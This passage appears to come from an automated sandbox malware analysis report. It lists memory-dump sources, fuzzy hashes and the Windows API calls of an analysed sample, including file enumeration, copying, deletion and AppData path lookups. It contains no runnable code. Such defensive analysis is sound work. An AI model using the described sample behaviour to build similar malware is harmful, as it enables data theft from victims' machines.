                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: rk&$rk&
                                • API String ID: 0-2442970839
                                • Opcode ID: 9b90b29649e72ee13aaa14da88d229cb79f8ddadf5731f53e49631000ebd4e58
                                • Instruction ID: 02a372b0a5dba8d05c15ad0ce066e5198fc48833c2d144e81277a5f80c38b555
                                • Opcode Fuzzy Hash: 9b90b29649e72ee13aaa14da88d229cb79f8ddadf5731f53e49631000ebd4e58
                                • Instruction Fuzzy Hash: 1341E4B290C2149FE705BF5CDCC176AB7E9EF58320F16092DEAD987340E63569208697
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f1c48823fba4c7aae9cea3248e0d7806dcd29e4855b908ed4154bc6bd78fcab2
                                • Instruction ID: ae3a170c023a4d0f428bea541e82e4dbfa8563a865da428176ee9c4968cf9ed5
                                • Opcode Fuzzy Hash: f1c48823fba4c7aae9cea3248e0d7806dcd29e4855b908ed4154bc6bd78fcab2
                                • Instruction Fuzzy Hash: D171D2B660C708DFD308AF29D85567AFBE8EF94710F26492EE5C683740E63558808B93
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7eca5f39c13b49edf3cc1c480b3691b9b8255d6d12295db2f1699dd2eced03ee
                                • Instruction ID: 136b6a6fd5ec1a1b01945854e36f906eaf12349cccecc4e3a99b4cfe543c85a6
                                • Opcode Fuzzy Hash: 7eca5f39c13b49edf3cc1c480b3691b9b8255d6d12295db2f1699dd2eced03ee
                                • Instruction Fuzzy Hash: C45186B3A0C3045FE3046E3DED9677ABBD5EF90720F1A853DEA8487744E97669018782
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 849069d60189830d5b1b09da8173e9dd526c48a866dfe63dc4f5daadb61e4366
                                • Instruction ID: 37695bd4410f7bda470cc51ef39a159804a3a6fdf7145fc0f03ea6e71895ef22
                                • Opcode Fuzzy Hash: 849069d60189830d5b1b09da8173e9dd526c48a866dfe63dc4f5daadb61e4366
                                • Instruction Fuzzy Hash: 755136B3B082145FF3045A2DEC95B7B77D9DBD4720F2A453DEA88D7380E8799C014292
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7b1b029a3fd9e24f368136211de6d8db5182d72ab1d645dd1115f65650207785
                                • Instruction ID: 412fd945f5e4c7d7d0b936f7f4009ba0172b5fed57beb7f91d33c4ad5528d549
                                • Opcode Fuzzy Hash: 7b1b029a3fd9e24f368136211de6d8db5182d72ab1d645dd1115f65650207785
                                • Instruction Fuzzy Hash: D851C2B36183109FE3186E68DC957BABBD9EB88320F16053DE7C587780E9755800879A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c84ff43bdd6b8aa17d2b624186e8d9e30806cdc311a0ec3ffaa1121a7effad7
                                • Instruction ID: 123c914a191a28e6f98a93242876ea2bbad0092e89d05ad7a585b62fdbf2e208
                                • Opcode Fuzzy Hash: 5c84ff43bdd6b8aa17d2b624186e8d9e30806cdc311a0ec3ffaa1121a7effad7
                                • Instruction Fuzzy Hash: 5441D6B3A0C2109BE3147A28EC467BABBE5EF54320F16453DDBC5C7780EA79984586C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fee8ec444139de76d89082e7bb9ade4727c9f21ba42a93b9352c12ec7efe6609
                                • Instruction ID: 583d1fff27be13296cb092eae1d8478d61058cd8688ee0f0e375bbc2617b1662
                                • Opcode Fuzzy Hash: fee8ec444139de76d89082e7bb9ade4727c9f21ba42a93b9352c12ec7efe6609
                                • Instruction Fuzzy Hash: B23159F364C2045FF308A929EC8577AB7D6DBC8320F16863DD688C7744E9795C058696
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 56fe6bffe377b2d84d62db91358cbb86a4efe0fe1ff14f2e5886ceef6aa8d873
                                • Instruction ID: e4d4396365ef3d0aba169f624f76dc15858e888e979a77233fd7fbbfc4a89fc0
                                • Opcode Fuzzy Hash: 56fe6bffe377b2d84d62db91358cbb86a4efe0fe1ff14f2e5886ceef6aa8d873
                                • Instruction Fuzzy Hash: 7631E5F36086089FE3087E3DEC8563AFBE5EF90220F16493EDAC5C3340EA3559458646
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 004E8636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 004E86AA
                                • StrStrA.SHLWAPI(?,00CFF438), ref: 004E86CF
                                • lstrcpyn.KERNEL32(007093D0,?,00000000), ref: 004E86EE
                                • lstrlen.KERNEL32(?), ref: 004E8701
                                • wsprintfA.USER32 ref: 004E8711
                                • lstrcpy.KERNEL32(?,?), ref: 004E8727
                                • StrStrA.SHLWAPI(?,00CFF450), ref: 004E8754
                                • lstrcpy.KERNEL32(?,007093D0), ref: 004E87B4
                                • StrStrA.SHLWAPI(?,00CFF798), ref: 004E87E1
                                • lstrcpyn.KERNEL32(007093D0,?,00000000), ref: 004E8800
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: 2e632af7ae6c6141896e252b4a86bd1f76ae010a8d1709b02d99416b45199960
                                • Instruction ID: 1d2184a11e6eca0cec45b94c405ea4318490af749ed718bbef30c835a53ae5ca
                                • Opcode Fuzzy Hash: 2e632af7ae6c6141896e252b4a86bd1f76ae010a8d1709b02d99416b45199960
                                • Instruction Fuzzy Hash: C0F17E71A01119EFCB10DB64DD48A9BB7B9EF48300F108659EA49E7351DF78AE01CFA9
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D1F9F
                                • lstrlen.KERNEL32(00CF9330), ref: 004D1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 004D1FE3
                                • lstrlen.KERNEL32(00501794), ref: 004D1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D200E
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D204D
                                • lstrlen.KERNEL32(00501794), ref: 004D2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D2075
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D2081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D20AC
                                • lstrlen.KERNEL32(?), ref: 004D20E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D2104
                                • lstrcat.KERNEL32(00000000,?), ref: 004D2112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D2139
                                • lstrlen.KERNEL32(00501794), ref: 004D214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D216B
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004D2177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D21A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D21D4
                                • lstrlen.KERNEL32(?), ref: 004D21EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D220A
                                • lstrcat.KERNEL32(00000000,?), ref: 004D2218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D2242
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D227F
                                • lstrlen.KERNEL32(00CFDEF0), ref: 004D228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D22B1
                                • lstrcat.KERNEL32(00000000,00CFDEF0), ref: 004D22B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D22F7
                                • lstrcat.KERNEL32(00000000), ref: 004D2304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004D2356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D2382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D23BF
                                • DeleteFileA.KERNEL32(00000000), ref: 004D23F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004D2444
                                • FindClose.KERNEL32(00000000), ref: 004D2453
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: 14667de3c16a50005ad5ec08e756b5cd81f55b06b9434fbe4dc671002eac1ec2
                                • Instruction ID: d95501d52d4d645b729185e7b66e8194598135b93ce6fb7e4f0e7915674e78d9
                                • Opcode Fuzzy Hash: 14667de3c16a50005ad5ec08e756b5cd81f55b06b9434fbe4dc671002eac1ec2
                                • Instruction Fuzzy Hash: CFE18170A1021A9BCB21EF65DEA5A9F77B9EF20304F04916BF905A7311DB7CDD018B98
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6445
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004E64AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E64E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6537
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: e5577a3295d3ad4cfa0acc883bbea48b5a729ad8870921098c4d6d78644d560e
